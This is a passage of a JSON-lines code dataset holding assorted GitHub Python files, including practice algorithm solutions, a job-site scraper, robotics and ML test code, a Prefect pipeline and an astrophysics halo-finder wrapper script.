len(self.INGREDIENTS[order[\"order\"]]) == 3:\n buy_list[self.INGREDIENTS[order[\"order\"]][2]] += 1\n return buy_list\n\n def check_ingredient_availability(self, order):\n quantities = self.get_quantities_to_buy()\n for ing in self.INGREDIENTS[order]:\n if quantities[ing] >= self.MINIMUM_INVENTORY[ing]:\n return False\n\n def get_available_dishes(self):\n result = set()\n for order in self.INGREDIENTS.keys():\n if self.check_ingredient_availability(order) is not False:\n result.add(order)\n return result\n","repo_name":"btrndd/restaurant-orders","sub_path":"src/inventory_control.py","file_name":"inventory_control.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35635289892","text":"from typing import List\nimport numpy as np\nfrom collections import Counter\nfrom itertools import product\nfrom functools import reduce\n\n\nclass CommonTechniquesBasic:\n def __init__(self):\n self.mb_containsDuplicates = self.containsDuplicates(a=[1, 2, 3, 1])\n self.mb_sumOfTwo = self.sumOfTwo([1, 2, 3], b=[10, 20, 30, 40], v=42)\n\n self.mi_sumInRange=self.sumInRange(nums=[3, 0, -2, 6, -3, 2], queries=[[0, 2], [2, 5], [0, 5]])\n self.mi_productExceptSelf=self.productExceptSelf(nums=[1, 2, 3, 4],m=2)\n\n def containsDuplicates(self, a):\n if (len(a) < 2):\n return False\n a.sort()\n for i in range(len(a) - 1):\n if a[i] == a[i + 1]:\n return True\n return False\n\n def sumOfTwo(self, a, b, v):\n if not a or not b:\n return False\n b = set(b) # kill duplicates\n for i in range(len(a)):\n diff = v - a[i]\n if diff in b:\n return True\n return False\n\n def sumInRange(self, nums, queries): # one hidden test fails, execution time limit\n res = nums[:]\n sums = []\n for i in range(len(queries)):\n first = queries[i][0]\n last = queries[i][1]\n sublist = res[first:last + 1]\n temp = sum(sublist)\n sums.append(temp)\n return 
sum(sums) % (10 ** 9 + 7)\n\n def productExceptSelf(self, nums, m):\n tempWithouti=[]\n f_i = lambda x, y: x * y\n for i in range(len(nums)):\n removed=nums.pop(i)\n red = reduce(f_i,nums)\n tempWithouti.append(red)\n nums.insert(i,removed)\n return tempWithouti\n\n\n\n\n\n\n\nclass NumberTheory:\n def __init__(self):\n self.mi_missingNumber = self.missingNumber(arr=[3, 1, 0])\n\n def missingNumber(self, arr):\n labels = sum(list(range(len(arr) + 1)))\n currentArr = sum(arr)\n missingLabel = labels - currentArr\n return missingLabel\n\n\nclass Sorting:\n def __init__(self):\n self.ml_bubbleSort = self.bubbleSort(items=[2, 4, 1, 5])\n self.ml_bubbleSort2 = self.bubbleSort2(items=[2, 2, 2, 3, 7, 8, 9, 10, 3])\n\n def bubbleSort(self, items):\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n for i in range(len(items) - 1):\n if items[i + 1] < items[i]:\n self.swap(i, i + 1, items)\n is_sorted = False\n return items\n\n def swap(self, i, j, items):\n items[i], items[j] = items[j], items[i]\n\n def bubbleSort2(self, items):\n\n def swap(firstIndex, secondIndex):\n temp = items[firstIndex]\n items[firstIndex] = items[secondIndex]\n items[secondIndex] = temp\n\n length = len(items) - 1\n\n for i in range(length):\n j = 0\n stop = length - i\n while j < stop - 1:\n if items[j] > items[j + 1]:\n swap(j, j + 1)\n j += 1\n return items\n\n\nclass Counting:\n def __init__(self):\n self.ms_pressingButtons = self.pressingButtons(buttons='9')\n\n def pressingButtons(self, buttons):\n if len(buttons) == 0:\n return []\n numb = ['2', '3', '4', '5', '6', '7', '8', '9']\n letters = ['abc', 'def', 'ghi', 'jkl', 'mno', 'pqrs', 'tuv', 'wxyz']\n d = dict(zip(numb, letters))\n cartesian = list(product(*[d[i] for i in buttons]))\n res = [*map(\"\".join, cartesian)]\n return res\n\n\nclass Strings:\n def __init__(self):\n self.ms_amendTheSentence = self.amendTheSentence(s='CodesignalIsAwesome')\n self.ms_strstr=self.strstr(s='CodefightsIsAwesome',x='IsA')\n self.ms_classifyStrings=self.classifyStrings(s='auy')\n\n def amendTheSentence(self, s):\n corrected = ''\n for i in range(len(s)):\n if ord(s[i]) in range(65, 91) and i == 0:\n x = s[i].lower()\n elif ord(s[i]) in range(65, 91) and i >= 1:\n x = ' ' + s[i].lower()\n else:\n x = s[i]\n corrected = corrected + x\n return corrected\n\n def strstr(self,s,x): #hard task\n pass\n\n def classifyStrings(self,s):\n pass\n\nclass HeapsStackQues:\n pass\n\nif __name__ == \"__main__\":\n coomtechb = CommonTechniquesBasic()\n numTheo = NumberTheory()\n sortTech = Sorting()\n counti = Counting()\n strings = Strings()\n\n print('TheEnd')\n","repo_name":"krzysiekbienias/CodeSignal","sub_path":"interviewPractice.py","file_name":"interviewPractice.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10966722898","text":"\n\nESTUDIANTES = []\n\n\ndef Persona(nombre1,apellido1):\n ESTUDIANTES.append([nombre1,apellido1])\n\n\nfor i in range(1,3):\n nombre = input(\"Digite su Nombre: \")\n apellido = input(\"Digite se Apellido: \")\n Persona(nombre, apellido)\n\nprint(ESTUDIANTES)","repo_name":"devchrisar/Playground","sub_path":"ejercicios_mintic2022/ciclo 01/13_TALLER/Ejemplo8.py","file_name":"Ejemplo8.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73341202137","text":"from absl.testing import parameterized\nimport numpy as np\nfrom tensor2robot.layers import 
mdn\nimport tensorflow.compat.v1 as tf\nimport tensorflow_probability as tfp\n\n\nclass MDNTest(tf.test.TestCase, parameterized.TestCase):\n\n def test_get_mixture_distribution(self):\n sample_size = 10\n num_alphas = 5\n batch_shape = (4, 2)\n alphas = tf.random.normal(batch_shape + (num_alphas,))\n mus = tf.random.normal(batch_shape + (sample_size * num_alphas,))\n sigmas = tf.random.normal(batch_shape + (sample_size * num_alphas,))\n params = tf.concat([alphas, mus, sigmas], -1)\n output_mean_np = np.random.normal(size=(sample_size,))\n gm = mdn.get_mixture_distribution(\n params, num_alphas, sample_size, output_mean=output_mean_np)\n self.assertEqual(gm.batch_shape, batch_shape)\n self.assertEqual(gm.event_shape, sample_size)\n\n # Check that the component means were translated by output_mean_np.\n component_means = gm.components_distribution.mean()\n with self.test_session() as sess:\n # Note: must get values from the same session run, since params will be\n # randomized across separate session runs.\n component_means_np, mus_np = sess.run([component_means, mus])\n mus_np = np.reshape(mus_np, component_means_np.shape)\n self.assertAllClose(component_means_np, mus_np + output_mean_np)\n\n @parameterized.parameters((True,), (False,))\n def test_predict_mdn_params(self, condition_sigmas):\n sample_size = 10\n num_alphas = 5\n inputs = tf.random.normal((2, 16))\n with tf.variable_scope('test_scope'):\n dist_params = mdn.predict_mdn_params(\n inputs, num_alphas, sample_size, condition_sigmas=condition_sigmas)\n expected_num_params = num_alphas * (1 + 2 * sample_size)\n self.assertEqual(dist_params.shape.as_list(), [2, expected_num_params])\n\n gm = mdn.get_mixture_distribution(dist_params, num_alphas, sample_size)\n stddev = gm.components_distribution.stddev()\n with self.test_session() as sess:\n sess.run(tf.global_variables_initializer())\n stddev_np = sess.run(stddev)\n if condition_sigmas:\n # Standard deviations should vary with input.\n self.assertNotAllClose(stddev_np[0], stddev_np[1])\n else:\n # Standard deviations should *not* vary with input.\n self.assertAllClose(stddev_np[0], stddev_np[1])\n\n def test_gaussian_mixture_approximate_mode(self):\n sample_size = 10\n num_alphas = 5\n # Manually set alphas to 1 in zero-th column and 0 elsewhere, making the\n # first component the most likely.\n alphas = tf.one_hot(2 * [0], num_alphas)\n mus = tf.random.normal((2, num_alphas, sample_size))\n sigmas = tf.ones_like(mus)\n mix_dist = tfp.distributions.Categorical(logits=alphas)\n comp_dist = tfp.distributions.MultivariateNormalDiag(\n loc=mus, scale_diag=sigmas)\n gm = tfp.distributions.MixtureSameFamily(\n mixture_distribution=mix_dist, components_distribution=comp_dist)\n approximate_mode = mdn.gaussian_mixture_approximate_mode(gm)\n with self.test_session() as sess:\n approximate_mode_np, mus_np = sess.run([approximate_mode, mus])\n # The approximate mode should be the mean of the zero-th (most likely)\n # component.\n self.assertAllClose(approximate_mode_np, mus_np[:, 0, :])\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"google-research/tensor2robot","sub_path":"layers/mdn_test.py","file_name":"mdn_test.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"68"} +{"seq_id":"1298561617","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nC, N = map(int, input().split())\ncities = [list(map(int, input().split())) for _ in range(N)]\nmax_reword = max(cities, 
key=lambda x: x[1])[1]\n\nINF = int(1e9)\ndp = [INF] * (C+1+max_reword)\ndp[0] = 0\n\n# max_reword가 필요한 이유는?\n# max_reword가 없었다면, C가 모든 reword보다 작을 때는?\n# cities를 정렬해야할까?\nfor cost, reword in cities:\n for cur in range(reword, C+1+max_reword):\n dp[cur] = min(dp[cur-reword] + cost, dp[cur])\n# print(dp)\nprint(min(dp[C:]))","repo_name":"jujemu/algorithm","sub_path":"dp/ex_bj_1106.py","file_name":"ex_bj_1106.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14725879595","text":"import random\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport csv\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef get_page(url):\n cookie = 'wd_guid=3f319504-2887-4ee3-b92f-799516dbf45b; historyState=state; _bl_uid=1nl987be8qsjw2gyOvX6vn9qF7ey; wt2=D4p-tJtlg0POIOZSgEvEIbCS2Cg52Ck1J9GLiy7XmhywhKHRVLngaaNoTGWpDurj-7yA1CzscNls6BYxNKbxgYw~~; wbg=0; Hm_lvt_194df3105ad7148dcf2b98a91b5e727a=1661430630,1661452564,1661827801,1661831717; Hm_lpvt_194df3105ad7148dcf2b98a91b5e727a=1661831734; __g=-; __l=l=%2Fwww.zhipin.com%2Fweb%2Fgeek%2Fjob%3Fquery%3Dpython%25E7%2588%25AC%25E8%2599%25AB%26city%3D100010000&s=3&friend_source=0; __c=1661831743; __a=20752938.1661401335.1661827824.1661831743.27.5.3.27; geek_zp_token=V1RNgjE-T62FhvVtRvyRwQKimy5TvRwSo~; __zp_stoken__=951feLAQQUD4kLFcDYnELRzAjR0l7JGYCWAUFW0YpATUxVwcoCGk8Fho8FxoKdQFcJU4BNBkBaRxVGklbQGJpPGxHCzIMIWQOPC0PQHl4e118KV8sBBhBaDJ1RU08OxI2ez8UHw0SXVtWAHA9PjBMGnxgMi1jeAUUcA9CG35cViNUIT1VBh1mAD1KMAZ%2BAiA%2FIEQ3PFohIQ%3D%3D'\n #Referer = 'https://www.zhipin.com/web/geek/job?query=python&city=101040100'\n #https://www.zhipin.com/web/geek/job?query=python%E7%88%AC%E8%99%AB&city=101020100\n '''\n proxy = {\n 'http':'223.96.90.216:8085'\n }\n '''\n\n headers = {\n\n 'Cookie':cookie,\n #'Referer':Referer,\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36'\n }\n try:\n response = requests.get(url,headers=headers)#,proxies=proxy\n if response.status_code == 200:\n time.sleep(4)\n response.encoding = response.apparent_encoding\n return response.text\n except requests.ConnectionError as e:\n print('Error', e.args)\n\n\ndef get_joblist(url):\n job_lists = []\n html = get_page(url)\n print(html)\n \n #1.已经获取到了第一页的信息(总页面),接下来应该是获取主页面的url列表\n data = json.loads(html)\n datas = data['zpData']['jobList']\n\n for i in datas:\n securityId = i['securityId']\n encryptJobId = i['encryptJobId']\n lid = i['lid']\n\n urls = 'https://www.zhipin.com/job_detail/{}.html?lid={}&securityId={}'.format(encryptJobId,lid,securityId)\n\n job_lists.append(urls)\n return job_lists\n \n\ndef get_job(html):\n\n soup = BeautifulSoup(html, 'lxml')\n job_all = soup.find_all('div', class_=\"info-primary\")\n if (job_all == []):\n print(\"cookie已过期\")\n #print(job_all)\n \n try:\n # 职位名\n job_title = re.findall('

        '9':\n if s[2] < '0' or s[2]>'9': \n if s[3] < '0' or s[3]>'9':\n print(\"No\")\n if sh.find(s[0]) != -1:\n if sh.find(s[4]) != -1:\n if sh.find(s[5]) != -1:\n print(\"Yes\")\n else:\n print(\"No\")\n else:\n print(\"No\")\n else:\n print(\"No\")\n","repo_name":"Nuray-web/python","sub_path":"acmp/номера_автобусов.py","file_name":"номера_автобусов.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34545603171","text":"# 문제링크 : https://school.programmers.co.kr/learn/courses/30/lessons/159994\r\ndef solution(cards1, cards2, goal):\r\n try :\r\n for i in range(len(cards1) + len(cards2)) :\r\n if len(cards1) > 0 and cards1[0] == goal[0] :\r\n cards1 = cards1[1:]\r\n goal = goal[1:]\r\n elif len(cards2) > 0 and cards2[0] == goal[0] :\r\n cards2 = cards2[1:]\r\n goal = goal[1:] \r\n else :\r\n return \"No\"\r\n if len(goal) == 0 :\r\n return \"Yes\"\r\n except :\r\n return \"No\"\r\n","repo_name":"kyungjun-kim/Problem_Solving","sub_path":"Programmers/Level_1/카드뭉치.py","file_name":"카드뭉치.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27402865001","text":"import logging\nimport threading\nimport weakref\n\nfrom .timer import Timer\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"MotorSafety\"]\n\n\nclass MotorSafety:\n \"\"\"Provides mechanisms to safely shutdown motors if they aren't updated\n often enough.\n\n This base class runs a watchdog timer and calls the subclass's stopMotor()\n function if the timeout expires.\n\n The subclass should call feed() whenever the motor value is updated.\n \"\"\"\n\n DEFAULT_SAFETY_EXPIRATION = 0.1\n __instanceList = weakref.WeakSet()\n __listMutex = threading.Lock()\n\n @classmethod\n def _reset(cls) -> None:\n with cls.__listMutex:\n cls.__instanceList.clear()\n\n def __init__(self) -> None:\n self.__enabled = False\n self.__expiration = self.DEFAULT_SAFETY_EXPIRATION\n self.__stopTime = Timer.getFPGATimestamp()\n self.__mutex = threading.Lock()\n with self.__listMutex:\n self.__instanceList.add(self)\n\n def feed(self) -> None:\n \"\"\"Feed the motor safety object.\n\n Resets the timer on this object that is used to do the timeouts.\n \"\"\"\n with self.__mutex:\n self.__stopTime = Timer.getFPGATimestamp() + self.__expiration\n\n def setExpiration(self, expirationTime: float) -> None:\n \"\"\"Set the expiration time for the corresponding motor safety object.\n\n :param expirationTime: The timeout value in seconds.\n \"\"\"\n with self.__mutex:\n self.__expiration = expirationTime\n\n def getExpiration(self) -> float:\n \"\"\"Retrieve the timeout value for the corresponding motor safety object.\n\n :returns: the timeout value in seconds.\n \"\"\"\n with self.__mutex:\n return self.__expiration\n\n def isAlive(self) -> bool:\n \"\"\"Determine of the motor is still operating or has timed out.\n\n :returns: True if the motor is still operating normally and hasn't\n timed out.\n \"\"\"\n with self.__mutex:\n return not self.__enabled or self.__stopTime > Timer.getFPGATimestamp()\n\n def check(self) -> None:\n \"\"\"Check if this motor has exceeded its timeout.\n This method is called periodically to determine if this motor has\n exceeded its timeout value. 
If it has, the stop method is called,\n and the motor is shut down until its value is updated again.\n \"\"\"\n from .robotstate import RobotState\n\n with self.__mutex:\n enabled = self.__enabled\n stopTime = self.__stopTime\n\n if not enabled or RobotState.isDisabled() or RobotState.isTest():\n return\n\n if stopTime < Timer.getFPGATimestamp():\n # TODO: fix this, causes recursion error\n logger.warning(\n \"%s... Output not updated often enough.\" % self.getDescription()\n )\n\n self.stopMotor()\n\n def setSafetyEnabled(self, enabled: bool) -> None:\n \"\"\"Enable/disable motor safety for this device.\n\n Turn on and off the motor safety option for this PWM object.\n\n :param enabled: True if motor safety is enforced for this object\n \"\"\"\n with self.__mutex:\n self.__enabled = bool(enabled)\n\n def isSafetyEnabled(self) -> bool:\n \"\"\"Return the state of the motor safety enabled flag.\n\n Return if the motor safety is currently enabled for this device.\n\n :returns: True if motor safety is enforced for this device\n \"\"\"\n with self.__mutex:\n return self.__enabled\n\n @classmethod\n def checkMotors(cls) -> None:\n \"\"\"Check the motors to see if any have timed out.\n This static method is called periodically to poll all the motors and\n stop any that have timed out.\n \"\"\"\n with cls.__listMutex:\n for elem in cls.__instanceList:\n elem.check()\n\n # abstract methods\n\n def stopMotor(self) -> None:\n raise NotImplementedError\n\n def getDescription(self) -> str:\n raise NotImplementedError\n","repo_name":"billyGirard/motorTest","sub_path":"testvenv/lib/python3.5/site-packages/wpilib/motorsafety.py","file_name":"motorsafety.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28613128337","text":"import prefect\nfrom prefect import Flow\nfrom prefect.schedules.schedules import CronSchedule\nfrom task.prep import *\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\nfrom task.prep2 import etl, train_mlflow_ray\n\nDF_PATH = './train.csv'\nBATCH_SIZE = 64\nTRAINING_EPOCH=3\nDEVICE = 'cpu'\nCRITERION = torch.nn.CrossEntropyLoss().to(DEVICE)\nLEARNING_RATE = 1e-3\ntrain_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5,), std=(1.0,))\n ])\nNet = MnistNet()\noptimizer = torch.optim.Adam(Net.parameters(), lr=LEARNING_RATE)\n\n\nclass Pipeline:\n _project_name = None\n _flow_name = None\n _logger = None\n _flow = None\n\n '''\n _param1 = Parameter(\"data_path\", default=\"default_path\")\n _param2 = Parameter(\"model_name\", default=\"GPN\")\n '''\n\n def __init__(self, project_name, flow_name, schedule=None):\n self._logger = prefect.context.get(\"logger\")\n self._logger.info(\"Create Pipeline\")\n\n self._project_name = project_name\n self._flow_name = flow_name\n self._schedule = schedule\n\n def create_flow(self):\n self._logger.info(f\"Create {self._flow_name} flow\")\n with Flow(self._flow_name) as flow:\n \"\"\"\n\n data = load_data(self._param1)\n prep_data = preprocess(data)\n model = train(self._param2, prep_data)\n save_model(model)\n \n \"\"\"\n # name = hello_task(\"kyle\")\n # name1 = hi_task(name)\n # name2 = hi_task(name)\n # buy_task(name1 + name2)\n # buy_task(name1 + name2)\n\n\n # 1 test\n\n # train_df, valid_df = load_dataset(df_path=DF_PATH)\n\n # train_loader, valid_loader, total_batch = preprocess_train(train_df, valid_df)\n\n # train_Net = 
cnn_training(train_loader=train_loader, total_batch=total_batch)\n # save_model(train_Net)\n # Net2 = return_Net2(train_Net)\n # feature_weight_df = make_knn_feature(train_df=train_df, train_loader=train_loader, Net2=Net2)\n # KNN = knn_training(feature_weight_df=feature_weight_df)\n # knn_result = predict_knn_model(323, train_df=train_df, valid_df=valid_df, Net2=Net2, KNN=KNN)\n # save_result(knn_result)\n\n # 2 test\n X, y = etl()\n\n a = train_mlflow_ray(X, y)\n\n # implement here\n # ...\n\n self._flow = flow\n self._register()\n\n def _register(self):\n self._logger.info(\n f\"Regist {self._flow_name} flow to {self._project_name} project\"\n )\n self._logger.info(f\"Set Cron {self._schedule}\")\n\n self._flow.register(\n project_name=self._project_name, \n idempotency_key=self.flow.serialized_hash()\n )\n\n if self._schedule:\n self._set_cron()\n\n def _set_cron(self):\n self.flow.schedule(CronSchedule(self._schedule))\n\n @property\n def flow(self):\n return self._flow\n\n @property\n def project_name(self):\n return self._project_name\n\n @property\n def flow_name(self):\n return self._flow_name\n","repo_name":"ehddnr301/prefect","sub_path":"Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33328235425","text":"import abc\nfrom typing import Any, Dict, List, NamedTuple, Optional, Sequence, Union\n\nimport numpy as np\nfrom optformer_neurips2022.t5x import utils\n\n\nfrom vizier import pyvizier as shared_pyvizier\nfrom vizier.service import pyvizier as oss_pyvizier\n\nScalar = Union[int, float, str]\nValue = Union[Scalar, Sequence[Scalar]]\nStudyInfo = Dict[str, Value]\nParameterInfo = Dict[str, Value]\nParameterValueDict = Dict[str, Scalar]\nParameterValueList = List[Scalar]\nParameterValues = Union[ParameterValueDict, ParameterValueList]\nParameterIntValues = List[int]\nMetricValueDict = Dict[str, Scalar]\nMetricValueList = List[Scalar]\nMetricValues = Union[MetricValueDict, MetricValueList]\nAlgorithmInfo = Union[str, int] # int corresponds to Algorithm ENUM\n\nAux = Dict[str, Any] # Auxiliary information to be returned from converter.\n\n# Token to denote the end of study information and the start of parameters'\n# information in the config.\nSTUDY_PARAMETER_SEPARATION_TOKEN = '&'\n# Token to denote separation between two parameters' information string in the\n# study config.\nPARAMETER_SEPARATION_TOKEN = '*'\n# Token to denote end of old trial and start of new trial.\nTRIAL_SEPARATION_TOKEN = '|'\n# parameter_metric_separation_token: Token to denote separation between a\n# trial's parameters and metrics.\nPARAMETER_METRIC_SEPARATION_TOKEN = '*'\n\n_MINIMUM_CONFIG_PROBABILITY = {\n 'bbob': 1.0,\n 'default': 0.1,\n}\n\n\nclass ConvertedStudy(NamedTuple):\n inputs: str # Conditioning inputs.\n target_inputs: str # Inputs aligned with the targets.\n targets: str # Targets.\n # The number of parameters with a non-fixed value in the search space. 
For a\n # conditional search space, we need to count all possible parameters.\n num_parameters: int\n aux: Aux\n num_permuted_trials: int = 0\n\n\nDEFAULT_VIZIER_ALGORITHM = 0\n\n\ndef get_algorithm(sc,\n default_algorithm = None):\n \"\"\"Gets algorithm name/ID.\"\"\"\n # Searches metadata for 'designer' key for generated studies.\n algo_info = sc.metadata.get('designer', default=None)\n if algo_info is None:\n # Returns standard algorithm ENUM for database studies.\n # WARNING: This could return 'DEFAULT' enum even for empty studies!\n return sc.algorithm\n else:\n algo_info = str(algo_info)\n if default_algorithm is not None and algo_info == default_algorithm:\n return DEFAULT_VIZIER_ALGORITHM\n else:\n return algo_info\n\n\nclass Converter(abc.ABC):\n \"\"\"Converts Studies into text representations for language models.\n\n These strings will later be fed into a tokenizer, which is dependent on\n Transformer pipeline.\n \"\"\"\n\n @abc.abstractmethod\n def study_to_texts(self,\n study):\n raise NotImplementedError('Abstract method')\n\n def set_config(self, config):\n \"\"\"Override configurations.\"\"\"\n raise NotImplementedError('Abstract method')\n\n def pytrial_to_parameter_values(\n self, aux,\n trial):\n \"\"\"Convert a trial to parameter values represented in integers.\"\"\"\n raise NotImplementedError('Abstract method')\n\n def parameter_texts_to_trial(\n self, aux, parameter_texts):\n \"\"\"Reverse the mapping from parameter value to text.\"\"\"\n raise NotImplementedError('Abstract method')\n\n @property\n def trial_token_scheme(self):\n raise NotImplementedError('Abstract property')\n\n @property\n def num_quantized_values(self):\n \"\"\"Number of quantized objective values.\"\"\"\n raise NotImplementedError('Abstract property')\n\n def objective_value_to_int(\n self,\n value,\n aux,\n metric_name = None):\n \"\"\"Convert a real objective value to a quantized integer.\"\"\"\n raise NotImplementedError('Abstract method')\n","repo_name":"neurips2022optformer/optformer_neurips2022","sub_path":"converters/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"26660841921","text":"\n\nimport os, sys\nimport numpy as np\n\nprintstr ='''Usage: py_rockstar filename \n -exe/-EXE exe_path \n -c/-config/-config_file config_file \n -o/-output/-outputfile outputfile\n\nExample:\n py_rockstar snp04441e.\\*\n\nBash example:\n for ((i=0; i<=8; i++))\n do\n\tnowfile=Omega_0.3071_binary.nbox2_overlap15.0_xyz0.0to150.0.ibox$i\n\techo $nowfile\n\tpy_rockstar $nowfile\n #jsub -n 1 -o ${nowfile}.output -e ${nowfile}.er py_rockstar $nowfile\n #sleep 2\n done\n '''\n\nif len(sys.argv) <=1:\n print(printstr)\n sys.exit()\n\ninputfile = sys.argv[1]\nprint('\\t set inputfile as: ', inputfile)\n\nexe_path = '/home/xiaodongli/software/Rockstar/rockstar '\nconfig_file = '/home/xiaodongli/software/Rockstar/quickstart.cfg' \noutputfile = None\n\nif len(sys.argv) > 2:\n for iarg in range(2,len(sys.argv),2):\n str1, str2 = sys.argv[iarg:iarg+2]\n if str1 in ['-exe', '-EXE']:\n exe_path = str2\n print('\\t set exe as: ', exe_path)\n elif str1 in ['-c', '-config', '-config_file']:\n config_file = str2\n print('\\t set config_file as: ', config_file)\n elif str1 in ['-o', '-output', '-outputfile']:\n outputfile = str2\n print('\\t set outputfile as: ', outputfile)\n else:\n print('Unknown option: ', str1)\n print(printstr)\n sys.exit()\n\nif outputfile == None:\n print(inputfile)\n 
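# derive a usable output name by stripping wildcard and escape characters from the input pattern before appending the suffix\n    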
outputfile = inputfile.replace(\".*\",\"\").replace(\".?\",\"\").replace(\"\\\\\",'').replace(\"*\",\"\").replace(\"?\",\"\")+'_rockstar_halo'\n print('\\t automatically set outputfile as: ', outputfile)\n\niran = np.random.uniform(10000000,99999999); ranpath = 'rs_ranpath_'+str(iran)\n\ncmd1 = 'mkdir -p '+ranpath \ncmd2 = 'cd '+ranpath\ncmd3 = 'ln -s ../'+inputfile+' ./'\ncmd4 = exe_path+' -c '+config_file +' ' + inputfile\ncmd5 = 'mv halos_0.0.ascii ../'+outputfile+'.ascii' \ncmd6 = 'mv halos_0.0.bin ../'+outputfile+'.bin'\ncmd7 = 'mv rockstar.cfg ../'+outputfile+'.cfg'\ncmd8 = 'cd ..'\ncmd9 = '/usr/bin/rm -rf '+ranpath\n\ncmd = ' && '.join([cmd1,cmd2,cmd3,cmd4,cmd5,cmd6,cmd7,cmd8,cmd9])\n\n\nprint('Now execute the command:\\n\\t\\t', cmd, '...')\nprint(os.popen(cmd).read())\n\n#print('rename the files...\\n\\t\\t', cmd5, '\\n\\t\\t', cmd6); \n\nprint('Convert file to x,y,z,vx,vy,vz,mvir,vmax format...')\ncmd = 'LSS_rockstar_select_xyzvxvyvz_mvir_vmax '+outputfile+'.ascii'\nprint('\\t\\t', cmd); print(os.popen(cmd).read())\n","repo_name":"xiaodongli1986/pythonlib","sub_path":"src/py_rockstar.py","file_name":"py_rockstar.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"70013293652","text":"\"\"\"\n10. Write a Python program to print the even numbers from a given list.\nSample List : [1, 2, 3, 4, 5, 6, 7, 8, 9]\nExpected Result : [2, 4, 6, 8]\n\"\"\"\nsample_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\ndef print_even_numbers(lst):\n even_list = []\n for item in lst:\n if item % 2 == 0:\n even_list.append(item)\n print(even_list)\n\n\nprint_even_numbers(sample_list)","repo_name":"AnjalBam/IWassign-data-types-functions-python","sub_path":"functions/10_even_numbers_from_list.py","file_name":"10_even_numbers_from_list.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20012092589","text":"import sklearn.metrics as metrics\r\nfrom wilsonscore import wilsonscore\r\nimport numpy as np\r\n\r\ndef evaluate(model, \r\n X_train_feat, y_train,\r\n X_val_feat, y_val,\r\n X_test_feat, y_test,\r\n NUM_CLASSES):\r\n X_train_prob = model.predict(X_train_feat)\r\n X_val_prob = model.predict(X_val_feat)\r\n X_test_prob = model.predict(X_test_feat)\r\n\r\n if len(X_train_prob.shape) > 1:\r\n assert len(X_train_prob.shape) == 2\r\n assert len(X_val_prob.shape) == 2\r\n assert len(X_test_prob.shape) == 2\r\n X_train_pred = np.argmax(X_train_prob, axis=1)\r\n X_val_pred = np.argmax(X_val_prob, axis=1)\r\n X_test_pred = np.argmax(X_test_prob, axis=1)\r\n else:\r\n X_train_pred = X_train_prob\r\n X_val_pred = X_val_prob\r\n X_test_pred = X_test_prob\r\n\r\n # f1 score\r\n if NUM_CLASSES == 2:\r\n train_mean_f1 = metrics.f1_score(y_train, X_train_pred, average='binary')\r\n val_mean_f1 = metrics.f1_score(y_val, X_val_pred, average='binary')\r\n test_mean_f1 = metrics.f1_score(y_test, X_test_pred, average='binary')\r\n\r\n train_weighted_f1 = -0.\r\n val_weighted_f1 = -.0\r\n test_weighted_f1 = -.0\r\n else:\r\n train_mean_f1 = metrics.f1_score(y_train, X_train_pred, average='macro')\r\n val_mean_f1 = metrics.f1_score(y_val, X_val_pred, average='macro')\r\n test_mean_f1 = metrics.f1_score(y_test, X_test_pred, average='macro')\r\n\r\n train_weighted_f1 = metrics.f1_score(y_train, X_train_pred, average='weighted')\r\n val_weighted_f1 = metrics.f1_score(y_val, X_val_pred, average='weighted')\r\n test_weighted_f1 = 
